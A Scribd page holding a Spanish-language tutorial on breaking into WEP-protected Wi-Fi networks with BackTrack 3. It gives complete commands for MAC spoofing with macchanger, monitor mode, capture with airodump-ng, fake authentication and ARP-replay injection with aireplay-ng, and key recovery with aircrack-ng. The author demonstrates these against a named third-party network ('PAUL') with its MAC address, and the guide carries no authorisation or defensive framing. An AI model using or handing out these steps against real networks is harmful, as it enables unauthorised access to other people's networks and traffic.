Scribd Logo
Unggah

Selamat datang di Scribd!

  • Ahora Puedes Ver El Contenido Oculto1

    Diunggah oleh

    juasd
    64 tayangan9 halaman

    Hak Cipta

    © Attribution Non-Commercial (BY-NC)

    Format Tersedia

    DOCX, PDF, TXT atau baca online dari Scribd

    Apakah menurut Anda dokumen ini bermanfaat?

    Apakah konten ini tidak pantas?

    Laporkan Dokumen Ini

    Hak Cipta:

    Attribution Non-Commercial (BY-NC)
    Unduh sebagai DOCX, PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    64 tayangan9 halaman

    Ahora Puedes Ver El Contenido Oculto1

    Diunggah oleh

    juasd

    Hak Cipta:

    Attribution Non-Commercial (BY-NC)
    Unduh sebagai DOCX, PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    dari 9

    Ahora puedes ver el Contenido Oculto1.-DESCARGAR EL BACTRACK.

    Empecemos por descargar(totalmente gratis), se puede descargar en


    una imagen ISO(para grabarlo en un CD) o también se puede descargar
    para el PENDRIVE(tu memoria usb, de 1gb mínimo).

    -Para descargar la imagen ISO:

    http://www.remote-exploit.org/cgi-bi...version=bt3-cd

    Este solo basta con quemarlo en un cd, puedes usar nero, alcohol.

    -Para descargar a Pendrive:

    http://www.remote-exploit.org/cgi-bi...ersion=bt3-usb

    Copiamos todo lo descargado al pendrive, ir a la carpeta boot, ejecutar


    bootinst esto es para que bootee desde el pendrive(en el bios configurar
    para que arranque desde el pendrive).

    2.-CRACKEANDO LAS REDES WI-FI

    2.a-Una vez dentro del backtrack nos dirigimos a una terminal (el cmd
    en Windows), aquí vamos a teclear: iwconfig , aquí veremos nuestra
    interfaz, en mi caso ath0(el tuyo pueda variar dependiendo de tu
    tarjeta), solo reemplazas ath0 por la tuya.
    2.b-Ahora vamos a detenerla con el siguiente comando: airmon-ng stop
    ath0
    2.c-Luego apagamos el wifi0 con el siguiente comando: ifconfig wifi0
    down

    2.d-Ahora cambiaremos nuestro mac, por cuestiones de comodidad que


    ya veras mas adelante, con el siguiente comando: macchanger –m
    00:00:00:00:00:11 wifi0
    2.e-Ahora ponemos nuestra tarjeta en mono monitor(para capturar
    paquetes que están por ahi) con el siguiente comando: airmon-ng start
    wifi0

    2.f-Ahora veremos las redes que están a nuestro alcance, en aquí


    tenemos que guardar en un archivo que llamaremos redes, puedes
    cambiarla por cualquier otra. Con el siguiente comando veremos las
    redes: airodump-ng -w redes ath0
    2.g-Aca en la primera columna podemos ver las MACs de las redes que
    hay.
    PWR: es la intensidad de la señal.
    #Data: son los datos guardados(que nos servirá para descifrar la clave)
    CH: es el canal en donde están estas redes.
    ENC: es la encriptación que usan(este tuto es solo para encriptaciones
    wep )
    ESSID: el nombre de las redes(las tape por obvias razones)

    Los numeritos y letras que hay abajo son los clientes que están
    conectados a una red, BSSID son los clientes, STATION la red a la que
    están conectados.(cosa que no importaran por ahora)

    Tambien pones ver las redes que hay en un solo canal por ejemplo el
    canal 4, el coamndo seria: airodump-ng -w redes -c 4 ath0

    Ahora seleccionamos una red con encriptación wep, anotemos su MAC,


    el CANAL y el NOMBRE, en este caso elegi la red de nombre PAUL can
    canal=1

    2.h-Ahora abrimos otra consola(la anterior la dejamos como el paso


    anterior)
    Comenzamos la saturación con el aireplay, debo mencionar que este
    paso no es imprescindible, solo hace que la captura de paquetes sea
    mas rápida (para los apurados), puedes dejar escaneando en todos los
    canales, puedes dejarlo unas cuantas horas y capturaras paquetes de
    diferentes canales.

    También, algunos ACCESS POINT no soportan este paso(*).

    2.i-Escribimos el comando: aireplay-ng -1 0 –e NOMBRE DE LA RED –a


    MAC DEL ACCESS POINT –h NUESTRA MAC ath0

    En mi caso quedaría: aireplay-ng -1 0 –e PAUL –a 00:1D:0F:F7:3F:04 –h


    00:00:00:00:00:11 ath0
    (*) Lo de rojo es que el ACCESS POINT si acepta la saturación de datos
    (aireplay), si la respuesta es contraria, tienes que esperar a que capture
    paquetes (mas lento).

    Ahora que el ACCESS POINT acepta el aireplay, pasamos a inyectar


    paquetes con el siguiente comando: aireplay-ng -3 –b MAC DEL ACCESS
    POINT –h NUESTRA MAC ath0

    2.j-En mi caso quedaría: aireplay-ng -3 –b 00:1D:0F:F7:3F:04 –h


    00:00:00:00:00:11 ath0

    Podemos ver como aumenta los paquetes (#Data)

    Una vez que tengamos los sufrientes paquetes(#Data) podemos seguir,


    unos 10000 serán suficientes, dependiendo de la contraseña.
    2.k-Luego abrimos otra terminal, y metemos ultimo comando: aircrack-
    ng redes-01.cap

    -Quiza te preguntes ¿porque el el redes-01?.


    -Redes por el archivo donde guardamos lo escaneado en los pasos
    anteriores.

    El 01 por el numero de veces que ejecutamos el airodumps que


    ejecutamos, para saber que numero poner, entrar al icono HOME en le
    escritorio.

    Nos quedaría asi: aircrack-ng redes-15.cap

    2.l-Seleccionamos el numero en donde se encuentra en este caso 11,


    escribimos 11 y enter.
    Y ya tenemos la contraseña, lo que esta entre corchetes( [] ) es la serie
    en Hexadecimal, la ASSCII es la serie, puedes poner cualquiera de las
    dos.

    Este manual fue realizado totalmente por mi, luego de haber leido varios
    manuales, unos no tan preciosos, espero que les sirva de algo.

    Si tiene algunos problemas no duden en contactarme

    Anda mungkin juga menyukai